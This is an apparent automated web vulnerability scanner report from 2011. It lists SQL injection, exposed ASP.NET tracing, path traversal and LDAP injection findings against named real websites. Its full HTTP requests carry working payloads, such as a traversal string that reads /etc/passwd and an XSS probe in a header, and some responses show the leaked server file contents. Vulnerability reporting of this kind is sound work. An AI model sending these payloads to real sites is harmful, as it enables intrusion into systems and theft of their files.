Set-Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5; expires=Mon, 09-May-2011 02:54:57 GMT; path=/quotient
Content-Type: text/html; charset=UTF-8
Content-Length: 46210

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<title>SEO Diagnostics Tool</t
...[SNIP]...
1.45. http://www.seoq.com/quotient/2011/05/01/2841/N [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.seoq.com
Path:   /quotient/2011/05/01/2841/N

Issue detail

The REST URL parameter 5 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 5, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /quotient/2011/05/01/2841'/N HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:54:10 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=UTF-8
Content-Length: 53789


<pre class="cake-debug">
<a href='javascript:void(0);' onclick='document.getElementById("CakeStackTrace1").style.display = (document.getElementById("CakeStackTrace1").style.display == "none" ? "" : "
...[SNIP]...
</b> 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' and
' at line 1</span>
...[SNIP]...
1.46. http://www.seoq.com/quotient/2011/05/01/2841/N [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /quotient/2011/05/01/2841/N

Issue detail

The REST URL parameter 6 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 6, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /quotient/2011/05/01/2841/N' HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response 1

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:54:38 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=UTF-8
Content-Length: 53610


<pre class="cake-debug">
<a href='javascript:void(0);' onclick='document.getElementById("CakeStackTrace1").style.display = (document.getElementById("CakeStackTrace1").style.display == "none" ? "" : "
...[SNIP]...
</b> 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''N'' ORDER BY `report_date` DESC LIMIT 2' at line 2</span>
...[SNIP]...

Request 2

GET /quotient/2011/05/01/2841/N'' HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response 2

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:54:38 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5; expires=Mon, 09-May-2011 02:54:39 GMT; path=/quotient
Content-Type: text/html; charset=UTF-8
Content-Length: 46210

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<title>SEO Diagnostics Tool</t
...[SNIP]...
2. ASP.NET tracing enabled  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hotwheelscollectors.com
Path:   /trace.axd

Issue detail

ASP.NET tracing appears to be enabled at the application level.

Request

GET /trace.axd HTTP/1.0
Host: www.hotwheelscollectors.com

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:14:00 GMT
Server: MII-WSD/1.4
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Via: HTTP/1.1 www.hotwheelscollectors.com (MII-WSD/1.4)
x-Message1: Powered by Mirror Image Internet
Expires: Mon, 02 May 2011 02:14:01 GMT
Cache-Control: max-age=10800
Content-Type: text/html; charset=utf-8
Content-Length: 21443
Age: 2
Via: 1.1 mdw107102 (MII-APC/1.6)
Connection: close

<html>
<head>
<style type="text/css">
span.tracecontent { background-color:white; color:black;font: 10pt verdana, arial; }
span.tracecontent table { font: 10pt verdana, arial; cellspacing:0; cellp
...[SNIP]...
<body>
<span class="tracecontent">
<table cellspacing="0" cellpadding="0" border="0" width="100%">
...[SNIP]...
3. File path traversal  previous  next
There are 6 instances of this issue:

3.1. http://www.ibegin.com/weather/weather_widget.php [background_color parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ibegin.com
Path:   /weather/weather_widget.php

Issue detail

The background_color parameter is vulnerable to path traversal attacks, enabling read access to arbitrary files on the server.

The payload ffffff../../../../../../../../etc/passwd%00ffffff was submitted in the background_color parameter. The requested file was returned in the application's response.

Request

GET /weather/weather_widget.php?type=js&country=us&state=Virginia&city=Reston&smallicon=1&current=1&forecast=1&background_color=ffffff../../../../../../../../etc/passwd%00ffffff&color=000000&width=175&padding=10&border_width=1&border_color=000000&font_size=11&font_family=Verdana&showicons=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.ibegin.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:49:21 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 1379


Notice: Undefined index: old in /home/ibegin.com/public_html/weather/weather_widget.php on line 24

Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64

Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/
...[SNIP]...
p:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
sshd:x:102:65534::/var/run/sshd:/usr/sbin/nologin
jphilp:x:1000:1000:Jaso
...[SNIP]...
3.2. http://www.ibegin.com/weather/weather_widget.php [city parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ibegin.com
Path:   /weather/weather_widget.php

Issue detail

The city parameter is vulnerable to path traversal attacks, enabling read access to arbitrary files on the server.

The payload Reston../../../../../../../../etc/passwd%00Reston was submitted in the city parameter. The requested file was returned in the application's response.

Request

GET /weather/weather_widget.php?type=js&country=us&state=Virginia&city=Reston../../../../../../../../etc/passwd%00Reston&smallicon=1&current=1&forecast=1&background_color=ffffff&color=000000&width=175&padding=10&border_width=1&border_color=000000&font_size=11&font_family=Verdana&showicons=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.ibegin.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:46:24 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 1379


Notice: Undefined index: old in /home/ibegin.com/public_html/weather/weather_widget.php on line 24

Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64

Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/
...[SNIP]...
p:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
sshd:x:102:65534::/var/run/sshd:/usr/sbin/nologin
jphilp:x:1000:1000:Jaso
...[SNIP]...
3.3. http://www.ibegin.com/weather/weather_widget.php [country parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ibegin.com
Path:   /weather/weather_widget.php

Issue detail

The country parameter is vulnerable to path traversal attacks, enabling read access to arbitrary files on the server.

The payload us../../../../../../../../etc/passwd%00us was submitted in the country parameter. The requested file was returned in the application's response.

Request

GET /weather/weather_widget.php?type=js&country=us../../../../../../../../etc/passwd%00us&state=Virginia&city=Reston&smallicon=1&current=1&forecast=1&background_color=ffffff&color=000000&width=175&padding=10&border_width=1&border_color=000000&font_size=11&font_family=Verdana&showicons=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.ibegin.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:45:01 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 1379


Notice: Undefined index: old in /home/ibegin.com/public_html/weather/weather_widget.php on line 24

Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64

Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/
...[SNIP]...
p:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
sshd:x:102:65534::/var/run/sshd:/usr/sbin/nologin
jphilp:x:1000:1000:Jaso
...[SNIP]...
3.4. http://www.ibegin.com/weather/weather_widget.php [font_family parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ibegin.com
Path:   /weather/weather_widget.php

Issue detail

The font_family parameter is vulnerable to path traversal attacks, enabling read access to arbitrary files on the server.

The payload Verdana../../../../../../../../etc/passwd%00Verdana was submitted in the font_family parameter. The requested file was returned in the application's response.

Request

GET /weather/weather_widget.php?type=js&country=us&state=Virginia&city=Reston&smallicon=1&current=1&forecast=1&background_color=ffffff&color=000000&width=175&padding=10&border_width=1&border_color=000000&font_size=11&font_family=Verdana../../../../../../../../etc/passwd%00Verdana&showicons=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.ibegin.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:55:16 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 1379


Notice: Undefined index: old in /home/ibegin.com/public_html/weather/weather_widget.php on line 24

Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64

Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/
...[SNIP]...
p:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
sshd:x:102:65534::/var/run/sshd:/usr/sbin/nologin
jphilp:x:1000:1000:Jaso
...[SNIP]...
3.5. http://www.ibegin.com/weather/weather_widget.php [state parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ibegin.com
Path:   /weather/weather_widget.php

Issue detail

The state parameter is vulnerable to path traversal attacks, enabling read access to arbitrary files on the server.

The payload Virginia../../../../../../../../etc/passwd%00Virginia was submitted in the state parameter. The requested file was returned in the application's response.

Request

GET /weather/weather_widget.php?type=js&country=us&state=Virginia../../../../../../../../etc/passwd%00Virginia&city=Reston&smallicon=1&current=1&forecast=1&background_color=ffffff&color=000000&width=175&padding=10&border_width=1&border_color=000000&font_size=11&font_family=Verdana&showicons=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.ibegin.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:45:43 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 1379


Notice: Undefined index: old in /home/ibegin.com/public_html/weather/weather_widget.php on line 24

Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64

Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/
...[SNIP]...
p:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
sshd:x:102:65534::/var/run/sshd:/usr/sbin/nologin
jphilp:x:1000:1000:Jaso
...[SNIP]...
3.6. http://www.ibegin.com/weather/weather_widget.php [type parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ibegin.com
Path:   /weather/weather_widget.php

Issue detail

The type parameter is vulnerable to path traversal attacks, enabling read access to arbitrary files on the server.

The payload js../../../../../../../../etc/passwd%00js was submitted in the type parameter. The requested file was returned in the application's response.

Request

GET /weather/weather_widget.php?type=js../../../../../../../../etc/passwd%00js&country=us&state=Virginia&city=Reston&smallicon=1&current=1&forecast=1&background_color=ffffff&color=000000&width=175&padding=10&border_width=1&border_color=000000&font_size=11&font_family=Verdana&showicons=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.ibegin.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:44:20 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 1379


Notice: Undefined index: old in /home/ibegin.com/public_html/weather/weather_widget.php on line 24

Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64

Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/
...[SNIP]...
p:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
sshd:x:102:65534::/var/run/sshd:/usr/sbin/nologin
jphilp:x:1000:1000:Jaso
...[SNIP]...
4. LDAP injection  previous  next
There are 3 instances of this issue:

4.1. http://www.cricbuzz.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.cricbuzz.com
Path:   /favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to LDAP injection attacks.

The payloads *)(sn=* and *)!(sn=* were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input may be being incorporated into a conjunctive LDAP query in an unsafe manner.

Request 1

GET /*)(sn=* HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.cricbuzz.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response 1

HTTP/1.1 404 CHttpException
Server: nginx
Date: Mon, 02 May 2011 00:08:34 GMT
Content-Type: text/html
Connection: keep-alive
Vary: Accept-Encoding
Content-Length: 15355
X-Varnish: 542435617
Age: 0
Via: 1.1 varnish
X-Served-By: garner.cricbuzz.com
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" xmlns:fb="http://www.facebook.com/2008/fbml"
...[SNIP]...
</li>
   <!--
   <li><a href="http://www.cricbuzz.com/icc-cricket-world-cup-2011" style="color:yellow;">ICC World Cup 2011 - New!</a></li>
   
       <li style="float:right;"><a href="http://ads.cricbuzz.com/adserver/adclick.php?bannerid=6764&zoneid=18&source=&dest=http%3A%2F%2Fspecials.cricbuzz.com%2Fipl%2F2010%2Fdspblack%2F" target="_blank" style="color:yellow;">Oomphire Videos</a></li>
   -->    
       <li id="blackberry_comm_show" style="float:right;"></li>    
   
</ul>

</div>

<script language="JavaScript" type="text/javascript" >
function loadBalance(url, matchid,source) {
   if(source == null){
       source = "flash"
   }
   var localServers = ["http://live.cricbuzz.com/live/scorecard/"];
   var localweightArray = [0,0,0,0,0,0,0,0,0,0];
   var localRange = 10;
   var lb = 0;
   try {
       if (hookServers) {
           localServers = hookServers;
           if (LBweightArray)
               localweightArray = LBweightArray;
           if (LBrange)
               localRange = LBrange;
           lb = $.cbz.commons.getRandom() % localRange;
           lb = localweightArray[lb];
       }
   } catch (err) {
   }
   var LBurl = localServers[lb];
   var referrer = window.top.location;
   $.getScript("http://ads.cricbuzz.com/adserver/counter/lb_logger.php?matchid="+ matchid + "&lb=" + LBurl + "&source=" + source + "&referrer=" + referrer);
   window.top.location = LBurl + url;
   return true;
}
</script>

</div>
               <style>

</style>

<div id="main">
<div class="column_left_66 " >
               <div class="column_content">
               <table cellspacing="0" width="100%" class="cbz_header_white" >
                   <tr>
                       <td class="cbz_white_header cbz_white_header_left"></td>
                       <td class="cbz_white_header cbz_white_header_center"></td>
                       <td class="cbz_white_header cbz_white_header_right"></td>
                   </tr>
               </table>
                       <div class="error_main">
                               <table cellspacing="0" width="100%" class="cbz_header_white" >
                                       <tr>
                                               <td class="cbz_white_header cbz_white_header_left"></td>
                                               <td class="cbz_white_header cbz_white_
...[SNIP]...

Request 2

GET /*)!(sn=* HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.cricbuzz.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response 2

HTTP/1.1 404 CHttpException
Server: nginx
Date: Mon, 02 May 2011 00:08:34 GMT
Content-Type: text/html
Connection: keep-alive
Vary: Accept-Encoding
Content-Length: 15616
X-Varnish: 542435619
Age: 0
Via: 1.1 varnish
X-Served-By: garner.cricbuzz.com
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" xmlns:fb="http://www.facebook.com/2008/fbml"
...[SNIP]...
</li>
   <li><a href="http://live2.cricbuzz.com/live/scorecard/9935/Kolkata-Knight-Riders-vs-Kings-XI-Punjab-37th-match" onclick="return !loadBalance('9935/Kolkata-Knight-Riders-vs-Kings-XI-Punjab-37th-match', 9935,'menu');">KOL vs MOH
        - KOL won
   </a></li>
   <!--
   <li><a href="http://www.cricbuzz.com/icc-cricket-world-cup-2011" style="color:yellow;">ICC World Cup 2011 - New!</a></li>
   
       <li style="float:right;"><a href="http://ads.cricbuzz.com/adserver/adclick.php?bannerid=6764&zoneid=18&source=&dest=http%3A%2F%2Fspecials.cricbuzz.com%2Fipl%2F2010%2Fdspblack%2F" target="_blank" style="color:yellow;">Oomphire Videos</a></li>
   -->    
       <li id="blackberry_comm_show" style="float:right;"></li>    
   
</ul>

</div>

<script language="JavaScript" type="text/javascript" >
function loadBalance(url, matchid,source) {
   if(source == null){
       source = "flash"
   }
   var localServers = ["http://live.cricbuzz.com/live/scorecard/"];
   var localweightArray = [0,0,0,0,0,0,0,0,0,0];
   var localRange = 10;
   var lb = 0;
   try {
       if (hookServers) {
           localServers = hookServers;
           if (LBweightArray)
               localweightArray = LBweightArray;
           if (LBrange)
               localRange = LBrange;
           lb = $.cbz.commons.getRandom() % localRange;
           lb = localweightArray[lb];
       }
   } catch (err) {
   }
   var LBurl = localServers[lb];
   var referrer = window.top.location;
   $.getScript("http://ads.cricbuzz.com/adserver/counter/lb_logger.php?matchid="+ matchid + "&lb=" + LBurl + "&source=" + source + "&referrer=" + referrer);
   window.top.location = LBurl + url;
   return true;
}
</script>

</div>
               <style>

</style>

<div id="main">
<div class="column_left_66 " >
               <div class="column_content">
               <table cellspacing="0" width="100%" class="cbz_header_white" >
                   <tr>
                       <td class="cbz_white_header cbz_white_header_left"></td>
                       <td class="cbz_white_header cbz_white_header_center"></td>
                       <td class="cbz_white_header cbz_white_header_right"></td>

...[SNIP]...
4.2. http://www.washingtonpost.com/wp-adv/jobs4/javascript/jobs_search_box.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.washingtonpost.com
Path:   /wp-adv/jobs4/javascript/jobs_search_box.js

Issue detail

The REST URL parameter 1 appears to be vulnerable to LDAP injection attacks.

The payloads *)(sn=* and *)!(sn=* were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input may be being incorporated into a conjunctive LDAP query in an unsafe manner.

Request 1

GET /*)(sn=*/jobs4/javascript/jobs_search_box.js?version=172 HTTP/1.1
Host: www.washingtonpost.com
Proxy-Connection: keep-alive
Referer: http://www.washingtonpost.com/wl/jobs/home?wpsrc=AG0002174&keyword=4846831919&cre=430450907&g=1&s_kwcid=TC-21380-4846831919-e-430450907
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WashingtonJobsSession=6zZRN9tGhpCv84LpLYbzSQp9QL2pZ6KRM7JFwNxyFRtwB9bjzDTH!1853811560

Response 1

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
ETag: 0e0741cd-f638-4e82-af66-b89bdca7d00c
Content-Type: text/html;charset=UTF-8
X-Cnection: close
Cache-Control: max-age=120
Date: Sun, 01 May 2011 23:33:04 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 64228

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="EN" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.fac
...[SNIP]...
<a href="http://www.washingtonpost.com/business/economy/running-in-the-red-how-the-us-on-the-road-to-surplus-detoured-to-massive-debt/2011/04/28/AFFU7rNF_story.html">Running in the red: How the U.S., on the road to surplus, detoured to massive debt</a>
               </li>
           <li>
                   <a href="http://www.washingtonpost.com/opinions/why-do-americans-still-dislike-atheists/2011/02/18/AFqgnwGF_story.html">Why do Americans still dislike atheists?</a>
               </li>
           <li>
                   <a href="http://www.washingtonpost.com/sports/redskins/nfl-draft-2011-redskins-add-nine-more-draft-picks-for-a-total-of-12/2011/04/30/AFTZo7NF_story.html">NFL draft 2011: Redskins add nine more draft picks for a total of 12</a>
               </li>
           <li>
                   <a href="http://www.washingtonpost.com/opinions/2011/04/06/AFNEgnqC_story.html">Why Glenn Beck lost it</a>
               </li>
           <li>
                   <a href="http://www.washingtonpost.com/local/tornado-tally-at-19-for-maryland-and-virginia/2011/04/30/AFySjwOF_story.html">Tornado tally at 19 for Maryland and Virginia</a>
               </li>
           </ul>
   </div>
   <div class="wp-column five">
       <ul class="normal">
           <li>
                   <a href="http://www.washingtonpost.com/world/libya-frontline-turns-quiet-as-rebels-regroup/2011/04/29/AFEwjwNF_story.html">Libya front line turns quiet as rebels regroup</a>
               </li>
           <li>
